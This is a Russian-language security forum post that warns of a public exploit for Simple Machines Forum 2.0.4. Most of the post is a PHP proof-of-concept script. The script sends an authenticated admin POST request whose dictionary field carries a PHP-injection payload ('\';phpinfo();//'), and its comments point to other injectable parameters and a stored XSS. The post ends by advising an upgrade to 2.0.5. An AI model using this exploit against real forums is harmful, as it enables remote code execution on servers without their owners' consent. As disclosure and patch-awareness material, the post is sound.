Осторожно уязвимость для Simple Machines 2.0.4 в паблике

Тема в разделе "Новости и статьи IT безопасности", создана пользователем X-Shar, 13 авг 2013.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Много форумов на этом движке, короче есть эксплоит:

    Код:
    ?php
     
    // proof of concept that latest SMF (2.0.4) can be exploited by php injection.
     
    // payload code must escape from \', so you should try with something like that:
    // p0c\';phpinfo();// as a 'dictionary' value. Same story for locale parameter.
    // For character_set - another story, as far as I remember, because here we have
    // a nice stored xss. ;)
     
    // 21/04/2013 
    // http://HauntIT.blogspot.com
     
    // to successfully exploit smf 2.0.4 we need correct admin's cookie:
    $cookie 'SMFCookie956=allCookiesHere';
    $ch curl_init('http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english');
     
    curl_setopt($chCURLOPT_HEADER1);
    curl_setopt($chCURLOPT_COOKIE$cookie);
    curl_setopt($chCURLOPT_POST1); // send as POST (to 'On')
    curl_setopt($chCURLOPT_POSTFIELDS"character_set=en&locale=helloworld&dictionary=p0c\\';phpinfo();//&spelling=american&ce0361602df1=c6772abdb6d5e3f403bd65e3c3c2a2c0&save_main=Save");
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
     
    $page curl_exec($ch);
     
    echo 
    'PHP code:<br>'.$page;
     
    curl_close($ch); // to close 'logged-in' part
     
    ?>
    ВАЖНО:Вышла версия 2.0.5 советую обновить !

    На сколько я понимаю уязвимость связана с куками ! :)
     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей